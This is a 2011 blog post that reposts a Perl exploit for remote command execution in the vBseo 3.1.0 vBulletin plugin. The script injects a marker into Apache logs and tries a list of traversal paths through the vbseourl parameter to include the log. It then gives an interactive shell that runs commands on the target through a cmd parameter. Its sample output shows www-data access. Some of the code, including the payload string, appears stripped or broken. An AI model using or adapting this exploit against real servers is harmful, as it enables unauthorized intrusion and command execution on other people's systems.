Pages

25 June 2011

Remote Command Execution vBseo 3.1.0

#!/usr/bin/perl
####################################################################
# vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit
# vendor: http://www.vbseo.com/
#
# Author: Jose Luis Gongora Fernandez (a.k.a) JosS
# twitter: @JossGongora
# mail: joss.xroot(0x40)gmail(0x2e)com
# site: http://www.hack0wn.com/
#
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# thanks: CWH Underground
#
####################################################################
# OUTPUT:
#
# Trying to Inject the Code...
# Successfully injected in ../../../../../../../var/log/apache2/access.log
#
# [shell]:~$ id
#  uid=33(www-data) gid=33(www-data) groups=33(www-data)
# [shell]:~$ uname -a
#  Linux mediapc 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686 GNU/Linux
# [shell]:~$ exit
# joss@h4x0rz:~/Desktop$


use LWP::UserAgent;
use IO::Socket;
use LWP::Simple;


@apache=(
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../var/www/logs/access_log",
"../../../../../../../var/www/logs/access.log",
"../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../var/log/apache/access_log",
"../../../../../../../var/log/apache2/access_log",
"../../../../../../../var/log/apache/access.log",
"../../../../../../../var/log/apache2/access.log",
"../../../../../../../var/log/access_log",
"../../../../../../../var/log/access.log",
"../../../../../../../var/www/logs/error_log",
"../../../../../../../var/www/logs/error.log",
"../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../var/log/apache/error_log",
"../../../../../../../var/log/apache2/error_log",
"../../../../../../../var/log/apache/error.log",
"../../../../../../../var/log/apache2/error.log",
"../../../../../../../var/log/error_log",
"../../../../../../../var/log/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/access_log"
);

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print "#######################################################################
";
print "#  vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit  #
";
print "#######################################################################

";


if (!$ARGV[0])
{
print "Usage: perl exploit.pl [host]
";
print "       perl exploit.pl localhost

";
exit;}

$host=$ARGV[0];
$path="/vbseo.php?vbseoembedd=1&vbseourl="; # change if it is necesary

# if ( $host   =~   /^http:/ ) {$host =~ s/http:////g;}

print "
Trying to Inject the Code...
";
$CODE="";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.

";
print $socket "GET /images/"."##%$$%##".$CODE."##%$$%##" . "HTTP/1.1";
print $socket "Host: ".$host."
";
print $socket "Connection: close

";
close($socket);

if ( $host   !~   /^http:/ ) {$host = "http://" . $host;}

foreach $getlog(@apache)
{
chomp($getlog);
$find= $host.$path.$getlog; # $find= $host.$path.$getlog."";
$xpl = LWP::UserAgent->new() or die "Could not initialize browser
";
$req = HTTP::Request->new(GET => $find);
$res = $xpl->request($req);
$info = $res->content;
if($info =~ /##\%$$\%##/) # change if it is necesary
{print "Successfully injected in $getlog 

";$log=$getlog; last;}
}

print "[shell]:~$ ";
chomp( $cmd =  );

while($cmd !~ "exit") {
$shell= $host.$path.$log."&cmd=$cmd"; # $shell= $host.$path.$log."&cmd=$cmd";
$xpl = LWP::UserAgent->new() or die "Could not initialize browser
";
$req = HTTP::Request->new(GET => $shell);
$res = $xpl->request($req);
$info = $res->content;
if ($info =~ /##%$$%##(.*?)##%$$%##/sg)
{print $1;}
print "[shell]:~$ ";
chomp( $cmd =  );
}

0 comments: